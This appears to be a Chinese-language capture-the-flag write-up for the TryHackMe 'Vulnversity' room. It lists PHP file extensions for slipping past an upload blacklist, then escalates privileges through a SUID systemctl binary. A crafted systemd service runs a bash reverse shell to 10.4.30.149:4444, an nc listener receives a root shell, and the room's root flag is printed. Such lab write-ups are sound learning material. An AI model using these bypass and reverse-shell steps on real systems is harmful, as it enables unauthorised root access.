tryhackme--Vulnversity
文件上传黑名单绕过
php服务器,.php文件被禁止上传,可以尝试以下文件后缀
.php
.php3
.php4
.php5
.phtml
提权
- 查找具有suid权限的文件
find / -perm -u=s -type f 2>/dev/null
执行结果,发现/bin/systemctl具有suid权限
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
- 创建服务文件
server1:/etc/systemd/system # cat /etc/systemd/system/test.service
[Unit]
Description=example systemd service unit file.
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.4.30.149/4444 0>&1'
[Install]
WantedBy=multi-user.target
- 创建软连接
systemctl link /tmp/test.service
- 启动服务
systemctl start test.service
- 获取shell
──(root💀kali)-[~/桌面/thm/3]
└─# nc -l -p 4444 -vv
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.234.90.
Ncat: Connection from 10.10.234.90:49430.
bash: cannot set terminal process group (1884): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnuniversity:/# whoami
whoami
root
root@vulnuniversity:/# cd ~
cd ~
root@vulnuniversity:/root# ls
ls
root.txt
root@vulnuniversity:/root# cat root.txt
cat root.txt
a58ff8579f0a9270368d33a9966c7fd5
浙公网安备 33010602011771号